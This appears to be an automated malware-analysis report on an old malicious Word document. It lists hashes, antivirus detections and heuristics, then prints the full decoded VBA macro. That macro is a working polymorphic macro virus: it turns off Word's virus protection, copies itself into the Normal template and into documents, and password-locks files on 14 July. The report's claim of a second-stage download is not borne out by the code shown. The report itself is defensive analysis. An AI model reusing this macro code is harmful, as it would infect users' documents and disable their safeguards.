Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 67827f12f860c4c3…

MALICIOUS

Office (OLE)

38.0 KB Created: 1999-11-05 16:04:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 11d4c52bd5bc0a9c7392cdb22a25b01b SHA-1: b4ea2e7baf1a817021b6ec8ff1ff7084ae4310ef SHA-256: 67827f12f860c4c3f6aaafbb3024af21c2764cfb8b59f6b9044fd9bc4ce8de57
202 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing VBA macros. The AutoOpen macro attempts to export a component to 'C:\Te618.sys', indicating an intent to download and execute a second-stage payload. The ClamAV detections 'Win.Trojan.Pivis-2' and 'Doc.Trojan.VMPCK2-1' further support its malicious nature. The document body content is unrelated to the malicious functionality.

Heuristics 5

  • ClamAV: Win.Trojan.Pivis-2 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Win.Trojan.Pivis-2
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 3334 bytes
SHA-256: 0336d6ed745e65ee81cd9838af6ccf4794cbd56fa182877f2466f1c0550f2843
Detection
ClamAV: Doc.Trojan.VMPCK2-1
Obfuscation or payload: likely
Carved artifact contains 2 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Te618"
Rem C293N807B54M314J509Q450H74J572R579O806J796Q692Q192R69F949S219E236U257G713P772R308S718U222I552I204N629D60O837O424E494V768I484M673B647U340D425R357J746
Rem G751U821E108A151I187W871N728D257B827R790H450M802M203F364N343M425N49
Sub AutoOpen()
On Error Resume Next
WordBasic.DisableAutoMacros 0
ActiveDocument.ReadOnlyRecommended = False
With Application
.EnableCancelKey = wdCancelDisabled
.DisplayAlerts = wdAlertsNone
Rem V242V114W632N901N244T74K759F378J526G580F78U111O899F948T440L768S382E325J152O99F691L182W470
.ScreenUpdating = False
Rem K356D703U529C756J461L207H95N169U97K272T749G672G89B322R296F479G340B481F863N754U330M80O409V114U619I149L219
Rem J616F685N602C44D245J583G835U526
End With
With Options
Rem O980H240T129N606N693T97
.ConfirmConversions = False
.VirusProtection = False
End With
Application.VBE.ActiveVBProject.VBComponents("Te618").Export "C:\Te618.sys"
MhTh317 = Application.VBE.SelectedVBComponent.Name
For KF16 = 1 To 20
OoOh613 = ""
Rem
LqKg284 = Application.VBE.ActiveVBProject.VBComponents.Item(MhTh317).CodeModule.ProcCountLines("AutoOpen", vbext_pk_Proc)
Rem H295S309I400T409Q658J949O515F582Q456U282P889G367A294W760N605G507R856C541J73K698L406V983
OqFo42 = Int(Rnd * LqKg284) + 1
Rem L173G87W283O306T318R174H72L452N30H135H759O962S553N190U318N596R714P759G549L564G415I970L582K32I137O153E375C614
DjGt53 = Int(Rnd * 40)
For x = 1 To DjGt53
OoOh613 = OoOh613 & Chr(65 + (Rnd * 22)) & Int(Rnd * 999)
Next x
Application.VBE.ActiveVBProject.VBComponents.Item(MhTh317).CodeModule.InsertLines OqFo42, "Rem " & OoOh613
Rem M908O440P64R699L155F325R50L756S324V803P904T416D953S695J16E164L405C275O848L187U372H770F446F877N374J859N930L329T258G178I2Q840G702J810Q437C410H709H797
Rem V932W838J804W258E693A338P110C290
Rem C798G45H381H947
Rem O89E283A152J547M780B405B311N517N329U769N431Q162B243R950I683R35R483F601U944O14P963
Next KF16
If Day(Now()) = 14 And Month(Now()) = 7 Then
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName, Password:="Atom#1"
End If
Rem L462I404G55F978B389I489D473G628M156V653L390C783K752N831A210C105H128A536O543S81
Rem N289H773A759S708B413T789I960T56V363M766B591K297O647G279S823N985U226P979F533C998P15
Rem J335P212B885B458Q754S209K867S409K348F806M537O88Q257B274V326O363I326
Rem O781E806E955B61R379K119D173B714M560F467Q751J902Q88O712A430J275W801P417Q276I433V121O347C185C432V541L971F378J281L138
Set So775 = ActiveDocument.VBProject.VBComponents
Set Qi968 = NormalTemplate.VBProject.VBComponents
For y = 1 To Qi968.Count
If Qi968(y).Name = "Te618" Then Fi962 = True
Next y
For y = 1 To So775.Count
If So775(y).Name = "Te618" Then Rz209 = True
Next y
If Fi962 = True And Rz209 = True Then Exit Sub
If Fi962 = True And Rz209 <> True Then So775.Import "c:\Te618.sys": ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
If Fi962 <> True And Rz209 = True Then Qi968.Import "c:\Te618.sys": NormalTemplate.Save
End Sub
Rem G160E645J412Q325O207E582C457U261R378G918O627J97M693U833A542U429
Rem B345M922M406T825P721
Rem L412P178J542S540J508F618L680U370H292D529F583I875L190

Open this report in the interactive analyzer, or submit your own file for analysis.